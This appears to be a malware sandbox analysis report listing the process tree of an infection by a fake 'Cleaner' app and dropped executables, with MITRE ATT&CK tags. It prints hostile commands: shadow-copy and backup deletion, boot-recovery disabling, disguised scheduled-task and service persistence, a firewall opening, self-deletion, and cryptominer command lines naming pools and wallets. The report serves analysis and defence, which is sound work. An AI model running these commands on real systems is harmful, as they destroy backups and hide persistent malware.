C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1828,1518887179799764213,4970876469676260911,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6012_347234889" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2516 /prefetch:15⤵
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1828,1518887179799764213,4970876469676260911,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6012_347234889" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2500 /prefetch:15⤵
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1828,1518887179799764213,4970876469676260911,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6012_347234889" --mojo-platform-channel-handle=3052 /prefetch:85⤵
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1828,1518887179799764213,4970876469676260911,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6012_347234889" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3336 /prefetch:25⤵
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1828,1518887179799764213,4970876469676260911,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6012_347234889" --mojo-platform-channel-handle=2176 /prefetch:85⤵
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1828,1518887179799764213,4970876469676260911,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6012_347234889" --mojo-platform-channel-handle=3464 /prefetch:85⤵
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1828,1518887179799764213,4970876469676260911,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6012_347234889" --mojo-platform-channel-handle=3412 /prefetch:85⤵
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1828,1518887179799764213,4970876469676260911,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6012_347234889" --mojo-platform-channel-handle=3712 /prefetch:85⤵
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -NoLogo -ExecutionPolicy AllSigned -Command "C:\Users\Admin\AppData\Local\Temp\AI_83B5.ps1 -paths 'C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\file_deleter.ps1','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites' -retry_count 10"3⤵
-
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall1⤵
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{20d39870-1be1-4e42-ba5a-a33dea18db02}\oemvista.inf" "9" "4d14a44ff" "0000000000000178" "WinSta0\Default" "000000000000017C" "208" "c:\program files (x86)\maskvpn\driver\win764"2⤵
-
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000198"2⤵
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc1⤵
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s DsmSvc1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\5FE0.exeC:\Users\Admin\AppData\Local\Temp\5FE0.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\6158.exeC:\Users\Admin\AppData\Local\Temp\6158.exe1⤵
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe"1⤵
-
C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exeMaskVPNUpdate.exe /silent2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\732C.exeC:\Users\Admin\AppData\Local\Temp\732C.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\7772.exeC:\Users\Admin\AppData\Local\Temp\7772.exe1⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\kuqkssdb\2⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\fxgolyke.exe" C:\Windows\SysWOW64\kuqkssdb\2⤵
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" create kuqkssdb binPath= "C:\Windows\SysWOW64\kuqkssdb\fxgolyke.exe /d\"C:\Users\Admin\AppData\Local\Temp\7772.exe\"" type= own start= auto DisplayName= "wifi support"2⤵
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" description kuqkssdb "wifi internet conection"2⤵
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" start kuqkssdb2⤵
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\7ADE.exeC:\Users\Admin\AppData\Local\Temp\7ADE.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\81E4.exeC:\Users\Admin\AppData\Local\Temp\81E4.exe1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Users\Admin\AppData\Local\Temp\9DBA.exeC:\Users\Admin\AppData\Local\Temp\9DBA.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\9FA0.exeC:\Users\Admin\AppData\Local\Temp\9FA0.exe1⤵
-
C:\Windows\SysWOW64\notepad.exenotepad.exe2⤵
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\svchost.exe" -start2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete3⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete4⤵
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C bcdedit /set {default} recoveryenabled no3⤵
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\svchost.exe" -agent 03⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\~temp001.bat3⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete4⤵
-
-
C:\Windows\SysWOW64\vssadmin.exevssadmin delete shadows /all /quiet4⤵
- Interacts with shadow copies
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet3⤵
-
C:\Windows\SysWOW64\vssadmin.exevssadmin delete shadows /all /quiet4⤵
- Interacts with shadow copies
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wbadmin delete catalog -quiet3⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures3⤵
-
-
C:\Windows\SysWOW64\notepad.exenotepad.exe3⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\BBC4.exeC:\Users\Admin\AppData\Local\Temp\BBC4.exe1⤵
-
C:\Users\Admin\Documents\Update.exe"C:\Users\Admin\Documents\Update.exe"2⤵
-
C:\Users\Admin\AppData\Local\Temp\Red1_.exe"C:\Users\Admin\AppData\Local\Temp\Red1_.exe"3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\DriverUpdate.exe"C:\Users\Admin\AppData\Local\Temp\DriverUpdate.exe"3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "WindowsSecurity" /tr '"C:\Users\Admin\AppData\Roaming\WindowsSecurity.exe"' & exit4⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "WindowsSecurity" /tr '"C:\Users\Admin\AppData\Roaming\WindowsSecurity.exe"'5⤵
- Creates scheduled task(s)
-
-
-
C:\Users\Admin\AppData\Roaming\WindowsSecurity.exe"C:\Users\Admin\AppData\Roaming\WindowsSecurity.exe"4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "WindowsSecurity" /tr '"C:\Users\Admin\AppData\Roaming\WindowsSecurity.exe"' & exit5⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "WindowsSecurity" /tr '"C:\Users\Admin\AppData\Roaming\WindowsSecurity.exe"'6⤵
- Creates scheduled task(s)
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"5⤵
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=antivirus.windowsdefenderautoupdater.me:3333 --user=4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQuiWzFUXCscKHeTzpD --pass=x --cpu-max-threads-hint=30 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=3 --cinit-idle-cpu=90 --nicehash --cinit-stealth5⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Clip_.exe"C:\Users\Admin\AppData\Local\Temp\Clip_.exe"3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\SteamUpdate.exe"C:\Users\Admin\AppData\Local\Temp\SteamUpdate.exe"3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "VideoDriver" /tr '"C:\Users\Admin\AppData\Roaming\VideoDriver.exe"' & exit4⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "VideoDriver" /tr '"C:\Users\Admin\AppData\Roaming\VideoDriver.exe"'5⤵
- Creates scheduled task(s)
-
-
-
C:\Users\Admin\AppData\Roaming\VideoDriver.exe"C:\Users\Admin\AppData\Roaming\VideoDriver.exe"4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "VideoDriver" /tr '"C:\Users\Admin\AppData\Roaming\VideoDriver.exe"' & exit5⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "VideoDriver" /tr '"C:\Users\Admin\AppData\Roaming\VideoDriver.exe"'6⤵
- Creates scheduled task(s)
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe"5⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\UpdateCore.exe"C:\Users\Admin\AppData\Local\Temp\UpdateCore.exe"3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C ping 1.1.1.1 -n 1 -w 100 > Nul & Del "C:\Users\Admin\AppData\Local\Temp\BBC4.exe"& ping 1.1.1.1 -n 1 -w 900 > Nul & Del "C:\Users\Admin\AppData\Local\Temp\BBC4.exe"2⤵
-
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 1003⤵
- Runs ping.exe
-
-
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 9003⤵
- Runs ping.exe
-
-
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\SysWOW64\kuqkssdb\fxgolyke.exeC:\Windows\SysWOW64\kuqkssdb\fxgolyke.exe /d"C:\Users\Admin\AppData\Local\Temp\7772.exe"1⤵
-
C:\Windows\SysWOW64\svchost.exesvchost.exe2⤵
-
C:\Windows\SysWOW64\svchost.exesvchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half3⤵
-
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Users\Admin\AppData\Roaming\swvttjsC:\Users\Admin\AppData\Roaming\swvttjs1⤵
-
C:\Users\Admin\AppData\Roaming\euvttjsC:\Users\Admin\AppData\Roaming\euvttjs1⤵
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x38c1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s seclogon1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
Network
MITRE ATT&CK Enterprise v6
Defense Evasion
Disabling Security Tools
1File Deletion
2Install Root Certificate
1Modify Registry
2Virtualization/Sandbox Evasion
1Web Service
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
296KB
-
Filesize
40.9MB
-
Filesize
36KB
-
